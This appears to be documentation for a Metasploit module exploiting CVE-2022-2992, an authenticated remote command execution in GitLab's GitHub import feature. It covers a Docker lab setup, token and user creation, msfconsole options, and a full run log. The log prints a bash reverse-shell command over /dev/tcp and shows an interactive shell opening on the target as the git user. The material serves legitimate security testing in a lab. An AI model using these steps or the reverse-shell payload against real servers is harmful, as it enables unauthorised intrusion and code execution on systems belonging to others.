Added module for CVE-2022-2992 - Gitlab Remote Command Execution via Github import

[heyder]

This module exploit the CVE-2022-2992, which allow an authenticate user to achieve remote code execution through the feature Github Import in a server running a affected version of the Gitlab.

Vulnerable Application

docker-compose.yml

services:
  gitlab:
    image: 'gitlab/gitlab-ee:15.3.1-ee.0'
    restart: always
    container_name: gitlab
    hostname: 'gitlab.example'
    network_mode: "bridge"
    ports:
      - '880:80'
      - '8443:443'
    volumes:
      - gitlab_config:/etc/gitlab
      - gitlab_logs:/var/log/gitlab
      - gitlab_data:/var/opt/gitlab
volumes:
  gitlab_config:
    driver: local
  gitlab_logs:
    driver: local
  gitlab_data:
    driver: local

$ docker-compose up

Wait for container to be "healthy" before continue. One can use this bash script to monitor the status.

$ # Creating personal access token for the root user
$ TOKEN=`tr -dc A-Za-z0-9 </dev/urandom | head -c 24 ; echo ''`
$ docker exec -e TOKEN=$TOKEN -it gitlab gitlab-rails runner "token = User.find_by_username('root').personal_access_tokens.create(scopes: [:sudo, :api], name: 'Automation token'); token.set_token(ENV['TOKEN']); token.save!"
$ # Using the personal access token from the root user a user.
$ USER=msf
$ PASSWORD=SuperStrongestGitlabPassword
curl --request POST --header "PRIVATE-TOKEN: $TOKEN" --data "skip_confirmation=true&[email protected]&name=$USER&username=$USER&password=$PASSWORD" "http://gitlab.example:880/api/v4/users"

Verification

Start a Ngrok tunnel

$ ngrok http 127.0.0.1:4567

Start msfconsole

• ./msfconsole -q
• use multi/http/gitlab_github_import_rce_cve_2022_2992
• set rhosts and rport
• set USERNAME msf
• set PASSWORD SuperStrongestGitlabPassword
• set NGROK_URL
• set SRVPORT 4567
• run

Scenarios

Doker container running Gitlab 15.3.1

msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > options

Module options (exploit/multi/http/gitlab_github_import_rce_cve_2022_2992):

   Name       Current Setting                         Required  Description
   ----       ---------------                         --------  -----------
   NGROK_URL  https://f8f5-194-230-160-77.eu.ngrok.i  yes       The Ngrok tunnel url
              o
   PASSWORD   12345678                                yes       The password for the specified username
   Proxies    http:172.25.144.1:8080                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.25.144.1                            yes       The target host(s), see https://github.com/rapid7/metasploit-framewor
                                                                k/wiki/Using-Metasploit
   RPORT      880                                     yes       The target port (TCP)
   SRVHOST    0.0.0.0                                 yes       The local host or network interface to listen on. This must be an add
                                                                ress on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    4567                                    yes       The local port to listen on.
   SSL        false                                   no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                            no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                                       yes       The base path to the gitlab application
   URIPATH                                            no        The URI to use for this exploit (default is random)
   USERNAME   heyder                                  yes       The username to authenticate as
   VHOST                                              no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting       Required  Description
   ----   ---------------       --------  -----------
   LHOST  host.docker.internal  yes       The listen address (an interface may be specified)
   LPORT  4444                  yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command

msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > exploit

[+] bash -c '0<&212-;exec 212<>/dev/tcp/host.docker.internal/4444;sh <&212 >&212 2>&212'
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) >
[-] Handler failed to bind to 169.254.192.184:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Using URL: http://host.docker.internal:4567/
[*] Executing command: bash -c '0<&151-;exec 151<>/dev/tcp/host.docker.internal/4444;sh <&151 >&151 2>&151'
[*] Session ID: lbid
[*] Creating group KQPhsIKX
[*] Importing a repository from github
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:58700) at 2022-11-19 15:23:06 +0100

msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > sessions -1
[*] Starting interaction with 1...

id
uid=998(git) gid=998(git) groups=998(git)
pwd
/var/opt/gitlab/gitlab-rails/working
exit
[*] Server stopped.
[*] 172.25.144.1 - Command shell session 1 closed.

TODO

• [x] Create documentation
• [ ] Ngrok wrapper ?
• [x] Module should "report" if vulnerable. By doing that the module can act as a "scan", given the chance for the user check multiple targets a save the result for further actions.
• [x] Test others payloads - During the tests only bash payload worked. I won't have time dig more into this.